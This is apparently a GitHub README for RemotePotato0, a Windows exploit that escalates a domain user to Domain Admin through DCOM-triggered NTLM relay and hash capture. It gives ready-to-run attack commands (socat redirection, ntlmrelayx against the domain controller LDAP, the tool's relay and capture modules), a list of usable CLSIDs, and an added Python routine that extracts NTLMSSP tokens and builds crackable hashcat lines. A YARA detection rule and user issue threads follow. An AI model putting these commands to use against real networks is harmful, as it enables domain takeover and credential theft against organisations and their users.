
RemotePotato0

Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that lets you escalate from a generic domain user to Domain Admin.

Briefly:

It abuses the DCOM activation service to trigger an NTLM authentication from any user currently logged on to the target machine. A privileged user (e.g. a Domain Admin) must be logged on to that same machine. Once the NTLM Type 1 (negotiate) message is triggered, a cross-protocol relay server receives the privileged Type 1 message and relays it to a third resource by unpacking it from the RPC protocol and re-packing the authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 can also capture the NTLMv2 responses (hashes) of every user logged on to the machine, for offline cracking.

Examples

Attacker machine (10.0.0.20)

Victim machine (10.0.0.45)

Victim Domain Controller (10.0.0.10)

Module 0 - Rpc2Http cross protocol relay server + potato trigger

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

Note: on Windows Server <= 2016 you could skip the network redirector (socat) because the OXID resolution could be performed locally. This no longer holds once the Windows Server 2019 fix has been backported (see the "JuicyPotato trigger does not work anymore" issue below); in that case use the external OXID resolver exactly as for Windows Server 2019.

Run query user on the victim to find the session ID of the privileged logged-on user, then pass it with -s:

query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Module 1 - Rpc2Http cross protocol relay server

.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20 
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 - Rpc capture (hash) server + potato trigger

query user
.\RemotePotato0.exe -m 2 -s 1

Module 3 - Rpc capture (hash) server

.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
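
The capture and relay logic described in the "Briefly" paragraph and exercised by modules 0-3 above, as an added example in Python that is not code from the RemotePotato0 repository: it unpacks the NTLMSSP token from the auth trailer of a DCE/RPC bind PDU (the "unpacking the RPC protocol" step), shows how that same token is re-packed as an HTTP Authorization: NTLM header for the relay leg, and, for the capture modules, turns a CHALLENGE/AUTHENTICATE pair into a hashcat -m 5600 line and verifies it offline against a candidate NT hash. The sample PDU, NTLMSSP messages, NTLMv2 blob and NT hash are all constructed inline; the negotiate flag values and the 8-byte server challenge are arbitrary and the parsers never interpret them.

```python
"""Model of what RemotePotato0's relay/capture modules do with the NTLMSSP tokens
carried in DCE/RPC bind traffic. Added example, not code from the project: the
PDU, messages, NTLMv2 blob and NT hash below are constructed test data."""
import base64
import hashlib
import hmac
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
RPC_AUTH_TYPE_NTLMSSP = 10      # sec_trailer auth_type for NTLMSSP (MS-RPCE)

def ntlmssp_from_rpc_pdu(pdu: bytes) -> bytes:
    """Unpack the NTLMSSP token from a connection-oriented DCE/RPC PDU.
    Header: ver(1) minor(1) ptype(1) flags(1) drep(4) frag_length(2)
    auth_length(2) call_id(4); the 8-byte sec_trailer plus auth_length
    bytes of auth_value sit at the very end of the fragment."""
    frag_len, auth_len = struct.unpack_from("<HH", pdu, 8)
    if auth_len == 0 or frag_len != len(pdu):
        raise ValueError("no auth trailer or truncated PDU")
    trailer = frag_len - auth_len - 8
    if pdu[trailer] != RPC_AUTH_TYPE_NTLMSSP:
        raise ValueError(f"auth_type {pdu[trailer]} is not NTLMSSP")
    token = pdu[trailer + 8:]
    if not token.startswith(NTLMSSP_SIG):
        raise ValueError("auth_value is not an NTLMSSP message")
    return token

def ntlm_message_type(token: bytes) -> int:
    return struct.unpack_from("<I", token, 8)[0]          # 1 negotiate, 2 challenge, 3 authenticate

def to_http_authorization(token: bytes) -> str:
    """Re-pack the raw token for the HTTP leg of the cross-protocol relay."""
    return "Authorization: NTLM " + base64.b64encode(token).decode()

def _field(token: bytes, off: int) -> bytes:
    length, _maxlen, offset = struct.unpack_from("<HHI", token, off)   # Len/MaxLen/BufferOffset
    return token[offset:offset + length]

def netntlmv2_line(type2: bytes, type3: bytes) -> str:
    """hashcat -m 5600 line from a CHALLENGE (type 2) / AUTHENTICATE (type 3) pair."""
    nt_resp = _field(type3, 20)                # NtChallengeResponse
    if len(nt_resp) <= 24:
        raise ValueError("NTLMv1 response, not NTLMv2")
    domain = _field(type3, 28).decode("utf-16-le")
    user = _field(type3, 36).decode("utf-16-le")
    challenge = type2[24:32]                   # ServerChallenge
    proof, blob = nt_resp[:16], nt_resp[16:]   # NTProofStr + temp blob
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"

def verify_netntlmv2(line: str, nt_hash: bytes) -> bool:
    """What a cracker does per guess: recompute NTProofStr from a candidate NT hash."""
    user, _, domain, chal, proof, blob = line.split(":")
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    expect = hmac.new(ntowf_v2, bytes.fromhex(chal) + bytes.fromhex(blob), hashlib.md5).digest()
    return hmac.compare_digest(expect, bytes.fromhex(proof))

def build_type2(challenge: bytes, target: str) -> bytes:
    tgt = target.encode("utf-16-le")
    msg = NTLMSSP_SIG + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(tgt), len(tgt), 56)    # TargetName right after the 56-byte header
    msg += struct.pack("<I", 0x00088207) + challenge + b"\x00" * 8   # flags (arbitrary), challenge, reserved
    msg += struct.pack("<HHI", 0, 0, 56 + len(tgt))        # empty TargetInfo
    msg += b"\x00" * 8                                     # Version
    return msg + tgt

def build_type3(user: str, domain: str, nt_resp: bytes) -> bytes:
    fields = [b"\x00" * 24, nt_resp, domain.encode("utf-16-le"),
              user.encode("utf-16-le"), b"", b""]          # Lm, Nt, Domain, User, Workstation, SessionKey
    msg, payload = NTLMSSP_SIG + struct.pack("<I", 3), b""
    for data in fields:
        msg += struct.pack("<HHI", len(data), len(data), 88 + len(payload))   # payload follows 88-byte header
        payload += data
    msg += struct.pack("<I", 0x00088205) + b"\x00" * 8 + b"\x00" * 16   # flags (arbitrary), Version, MIC
    return msg + payload

def wrap_in_rpc_bind(token: bytes, body: bytes = b"\x00" * 32) -> bytes:
    frag_len = 16 + len(body) + 8 + len(token)
    hdr = struct.pack("<BBBBIHHI", 5, 0, 11, 0x03, 0x10, frag_len, len(token), 1)   # ptype 11 = bind
    sec_trailer = struct.pack("<BBBBI", RPC_AUTH_TYPE_NTLMSSP, 6, 0, 0, 0)           # level 6 = pkt_privacy
    return hdr + body + sec_trailer + token

def demo() -> str:
    nt_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # NT hash of "password"
    challenge, blob = b"\x11" * 8, b"\x01\x01" + b"\x00" * 6 + b"\x22" * 16 + b"\x00" * 12
    ntowf_v2 = hmac.new(nt_hash, "ADMINCORP".encode("utf-16-le"), hashlib.md5).digest()
    nt_resp = hmac.new(ntowf_v2, challenge + blob, hashlib.md5).digest() + blob   # NTProofStr + blob
    type2, type3 = build_type2(challenge, "CORP"), build_type3("admin", "CORP", nt_resp)
    token = ntlmssp_from_rpc_pdu(wrap_in_rpc_bind(type3))   # what the RPC capture server sees
    assert ntlm_message_type(token) == 3
    return netntlmv2_line(type2, token)

if __name__ == "__main__":
    print(demo())
```

The relay half is only the framing: the real tool also has to forward the Type 2 challenge it gets back over HTTP into the RPC bind_ack so the victim's Type 3 is computed against the target's challenge, which is why a captured Type 3 can be relayed but not replayed later.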

Usage



        RemotePotato0
        @splinter_code & @decoder_it



Mandatory args:
-m module
        Allowed values:
        0 - Rpc2Http cross protocol relay server + potato trigger (default)
        1 - Rpc2Http cross protocol relay server
        2 - Rpc capture (hash) server + potato trigger
        3 - Rpc capture (hash) server


Other args (some are mandatory and some optional depending on the module you use):
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

Demo

Cross session activation

Hash Stealer

CLSID List

A list of usable CLSIDs on various Windows versions:

Windows Server 2019

{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser

Windows Server 2016

{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Windows Server 2008 R2

{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

You can find a more complete list here --> http://ohpe.it/juicy-potato/CLSID/

Detection

Yara rule to detect RemotePotato0 binary:

rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
        
    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
        
    condition:        
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}

Issues
  • Potato newb question :-)

    Hello!

    I've been reading the tech papers about this exploit and, admittedly, it caused my brain to leak out of my ears and onto my keyboard :-)

    So I staged up a test DC, joined some Win10 machines to it and looked to recreate the exploit in action. It worked as advertised, which was awesome! However, I found that by default the average/default AD user doesn't have WinRm capability into anything in my server subnet, so I had to explicitly add my test user (Student10) into the Remote Management Users group. Once I did that and ran RemotePotato0, the fireworks flew:

    So my newb question is: do you think in most AD environments this exploit is slightly less of a threat unless the admins have specifically configured a bunch of users/groups to have WinRm/SSH privs? Or is it a "I'm not doing it right" kind of situation where I can leverage RemotePotato0 in more common configuration scenarios?

    Thanks! Brian

    opened by braimee 1
  • CLSID not found

    I am attempting to use this and I got the following output on the user machine.

    C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
    [*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
    [*] RPC relay server listening on port 9997 ...
    [*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
    [*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
    [*] IStoragetrigger written: 104 bytes
    [!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.
    

    The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?

    opened by metac0rtex 1
  • JuicyPotato trigger does not work anymore in Windows pre 2019

    On Windows Server versions prior to 2019 the JuicyPotato trigger (the one not requiring an external OXID resolution) does not work anymore. It seems that at a certain point in time MS backported the Windows Server 2019 fix to the older versions.

    See --> https://twitter.com/decoder_it/status/1493916092493877248

    A fix should be to use an external OXID resolver, as is already done for Windows Server 2019.

    bug 
    opened by antonioCoco 0
  • Bug in RPC capture server

    The RPC capture server in charge of grabbing the NTLMv2 response uses the hardcoded value 268 to hold the data. While no particular bugs were found on the tested Windows versions, it could have bugs on Win11 and Server 2022. The allocation should be managed dynamically with a malloc() call instead of using a local array with a fixed size --> https://github.com/antonioCoco/RemotePotato0/blob/main/RPCCaptureServer.cpp#L168

    bug enhancement 
    opened by antonioCoco 0
Releases: 1.2
Owner
- @splinter_code - reverse engineering / malware analysis / obfuscation / windows internals